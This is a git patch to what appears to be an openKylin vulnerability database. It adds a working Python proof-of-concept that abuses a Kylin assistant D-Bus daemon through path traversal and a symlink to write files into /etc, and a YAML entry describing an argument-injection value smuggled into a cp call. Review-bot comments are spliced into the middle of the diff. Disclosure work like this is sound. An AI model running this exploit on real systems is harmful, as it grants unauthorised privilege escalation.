From 41449b3aea9aeac45113b1e032f2ddb50bb51eb8 Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Fri, 21 Oct 2022 10:17:12 +0800
Subject: [PATCH] ADD KVE-2022-0205

---
 .../2022/yaml/KVE-2022-0210.yaml | 2 +-
 .../2022/KVE-2022-0205/poc.py | 40 +++++++++++++++++++
 .../2022/yaml/KVE-2022-0205.yaml | 19 +++++++++
 vulnerability_list.yaml | 6 ++-
 4 files changed, 64 insertions(+), 3 deletions(-)
 create mode 100644 kve/youker-assistant/2022/KVE-2022-0205/poc.py
 create mode 100644 kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml

diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
index 60a558db..df9264e5 100644
--- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
+++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml
@@ -2,7 +2,7 @@ id: KVE-2022-0210
 source: openKylin Community
 info:
   name: 源管理服务的setMainSource接口任意文件写入漏洞。
-  severity: critical
+  severity: high
   description: |
     com.kylin.software.properties.interface.setMainSource接口存在任意文件写入漏洞。实现方法是调用命令"cp file /etc/apt/sources.list"。但如果传递的参数为"['-t /etc /path/to/evil.txt'],由于开发者在实现时会将这个字符串按空格进行分割,并作为参数传递到cp命令,因此就会触发命令 "cp -t /etc /path/to/evil.txt /etc/apt/sources.list",从而实现任意文件夹的任意文件写入,导致权限提升。任意命令。
   scope-of-influence:
diff --git a/kve/youker-assistant/2022/KVE-2022-0205/poc.py b/kve/youker-assistant/2022/KVE-2022-0205/poc.py
new file mode 100644
index 00000000..3bda459c
--- /dev/null
+++ b/kve/youker-assistant/2022/KVE-2022-0205/poc.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+
+import sys
+import dbus
+import os
+
+def run_cmd(cmd):
+    os.system(cmd)
+
+def copy_file(target_dir, src_file):
+    copy_cmd=f'''
+    srcDir=$(mktemp -d)
+    homeDir=/tmp/fakeroot/$srcDir
+    srcFile={src_file}
+    targetDir={target_dir}
+    gdbus call --system --dest com.kylin.assistant.systemdaemon \
+        --object-path /com/kylin/assistant/systemdaemon \
+        --method com.kylin.assistant.systemdaemon.set_homedir "$homeDir"
+
+    # prepre src dir
+    mkdir -p $srcDir/stereo
+    cp $srcFile $srcDir/stereo
+
+    # prepare target dir
+    mkdir -p $homeDir
+    mkdir -p $homeDir/.sounds..
+    cd $homeDir
+    ln -s $targetDir stereo
+
+    gdbus call --system --dest com.kylin.assistant.systemdaemon \
+        --object-path /com/kylin/assistant/systemdaemon \
+        --method com.kylin.assistant.systemdaemon.restore_all_sound_file "../../../..$srcDir"
+
+    '''
+    run_cmd(copy_cmd)
+
+os.system('touch restore_all_sound_file.txt')
+copy_file("/etc", os.path.realpath("./restore_all_sound_file.txt"))
+os.system('ls -l /etc/restore_all_sound_file.txt')
+os.system('rm restore_all_sound_file.txt')
\ No newline at end of file
diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml
new file mode 100644
index 00000000..0e9b92df
--- /dev/null
+++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml
@@ -0,0 +1,19 @@
+id: KVE-2022-0205
+source: openKylin Community
+info:
+  name: restore_all_sound_file方法任意写文件漏洞。
+  severity: high
+  description: |
+    com.kylin.assistant.systemdaemon服务的restore_all_sound_file方法存在路径穿越,导致任意文件写入,导致权限提升。
+  scope-of-influence:
+    youker-assistant< 3.0.2-0kylin6k64~rc2
+  reference:
+    -
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: None
+    cwe-id: None
+    cnvd-id: None
+    kve-id: KVE-2022-0205
+  tags: kve2022,dbus
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 475177cc..2cdeb4ef 100644
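Review bot: `import sys` and `import dbus` at the top of poc.py are never used — every D-Bus interaction goes through the `gdbus` command inside the shell snippet — and `dbus` is a third-party module, so the script fails at import on a host without it for no benefit; drop both lines and keep only `import os`. `run_cmd` discards the exit status of `os.system(cmd)`, so a failing `gdbus` call is silent and the trailing `ls -l` is the only success signal; `return os.system(cmd)` and checking the value in `copy_file` would make the outcome explicit. The file also has no module docstring; it should state which daemon method is exercised (`restore_all_sound_file` on `com.kylin.assistant.systemdaemon`), the conditions under which it is expected to reproduce, and that the artifacts it creates — the `mktemp -d` directory, `/tmp/fakeroot`, the `set_homedir` change and the file written under `/etc` — are not cleaned up by the final `rm`, which deletes only the local source file. The `# prepre src dir` comment has a typo (`prepare`).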
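Review bot: `reference:` holds a single bare `-` item, which YAML reads as a one-element list containing null rather than an empty list; either fill in the advisory or fix-commit URL or write `reference: []`. `cve-id: None`, `cwe-id: None` and `cnvd-id: None` are the literal string `None`, not a YAML null (`null` or `~`), so tooling that checks for a missing identifier sees a value; `cwe-id` at least could be filled in, since the description states a path-traversal write (CWE-22). `scope-of-influence` is given as the bare scalar `youker-assistant< 3.0.2-0kylin6k64~rc2` rather than a list entry, and the missing space before `<` makes the package/version split ambiguous for a parser; the file is also saved without a trailing newline.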
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -23,5 +23,7 @@ cve:
   - CVE-2021-4034
 cnvd:
 kve:
-  kylin-software-properties
-  - KVE-2022-0210
\ No newline at end of file
+  kylin-software-properties:
+  - KVE-2022-0210
+  youker-assistant:
+  - KVE-2022-0205
\ No newline at end of file
-- 
Gitee